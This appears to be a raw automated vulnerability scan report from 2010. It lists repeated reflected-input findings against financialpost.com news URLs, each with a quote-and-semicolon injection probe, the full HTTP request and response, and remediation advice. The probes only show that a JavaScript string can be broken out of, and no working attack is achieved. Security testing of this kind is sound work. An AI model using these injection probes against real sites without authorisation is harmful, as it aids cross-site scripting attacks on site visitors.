<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insidere64d5';e02aad2f8d9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insidere64d5';e02aad2f8d9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30835417?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bf26'%3b4023866e636 was submitted in the REST URL parameter 4. This input was echoed as 7bf26';4023866e636 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/39879677bf26'%3b4023866e636/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78912 Expires: Sun, 19 Dec 2010 03:11:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways-nail-first-impression/39879677bf26';4023866e636/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways-nail-first-impression;kw=39879677bf26';4023866e636;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7885c'%3b6d8892f2062 was submitted in the REST URL parameter 5. This input was echoed as 7885c';6d8892f2062 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/3987967/7885c'%3b6d8892f2062 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44327
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb9'%3b332834b26ae was submitted in the REST URL parameter 1. This input was echoed as c7cb9';332834b26ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsc7cb9'%3b332834b26ae/economy/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43266
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23396'%3bcca2d7dd2c5 was submitted in the REST URL parameter 2. This input was echoed as 23396';cca2d7dd2c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy23396'%3bcca2d7dd2c5/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfab'%3bb5657ebc138 was submitted in the REST URL parameter 1. This input was echoed as 2cfab';b5657ebc138 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2cfab'%3bb5657ebc138/economy/Europe+North+America/3996015/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 77584 Expires: Sun, 19 Dec 2010 03:10:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news2cfab';b5657ebc138/economy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news2cfab';b5657ebc138;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98496123?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4482'%3b595e9a6b3a0 was submitted in the REST URL parameter 2. This input was echoed as e4482';595e9a6b3a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economye4482'%3b595e9a6b3a0/Europe+North+America/3996015/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 90835 Expires: Sun, 19 Dec 2010 03:10:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economye4482';595e9a6b3a0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economye4482';595e9a6b3a0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=28719133?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e012'%3bed7a07312f0 was submitted in the REST URL parameter 4. This input was echoed as 2e012';ed7a07312f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/39960152e012'%3bed7a07312f0/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69569 Expires: Sun, 19 Dec 2010 03:10:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe-north-america/39960152e012';ed7a07312f0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe-north-america;kw=39960152e012';ed7a07312f0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=160 ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6b5'%3b2734327df9e was submitted in the REST URL parameter 5. This input was echoed as 5d6b5';2734327df9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/3996015/5d6b5'%3b2734327df9e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38125
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61908'%3b80f0b405c4b was submitted in the REST URL parameter 1. This input was echoed as 61908';80f0b405c4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news61908'%3b80f0b405c4b/energy/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36429
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ef9'%3b742404652a1 was submitted in the REST URL parameter 2. This input was echoed as f4ef9';742404652a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energyf4ef9'%3b742404652a1/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36392
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96160'%3bf94decf6ed was submitted in the REST URL parameter 1. This input was echoed as 96160';f94decf6ed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news96160'%3bf94decf6ed/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 75926 Expires: Sun, 19 Dec 2010 03:10:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news96160';f94decf6ed/energy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news96160';f94decf6ed;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50020139?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44511'%3b8f538e1d670 was submitted in the REST URL parameter 2. This input was echoed as 44511';8f538e1d670 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy44511'%3b8f538e1d670/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 89223 Expires: Sun, 19 Dec 2010 03:10:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy44511';8f538e1d670/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy44511';8f538e1d670;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68677683?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3480f'%3bb1bf66ee4c8 was submitted in the REST URL parameter 4. This input was echoed as 3480f';b1bf66ee4c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/39959423480f'%3bb1bf66ee4c8/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70550 Expires: Sun, 19 Dec 2010 03:10:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor-deal-with-total-directional-shift-says/39959423480f';b1bf66ee4c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor-deal-with-total-directional-shift-says;kw=39959423480f';b1bf66ee4c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookie ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa269'%3b0b5f135b547 was submitted in the REST URL parameter 5. This input was echoed as aa269';0b5f135b547 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/aa269'%3b0b5f135b547 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38763
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d120'%3b5f07c23c576 was submitted in the REST URL parameter 1. This input was echoed as 1d120';5f07c23c576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1d120'%3b5f07c23c576/financials/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a363'%3be5e52d355ae was submitted in the REST URL parameter 2. This input was echoed as 5a363';e5e52d355ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials5a363'%3be5e52d355ae/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
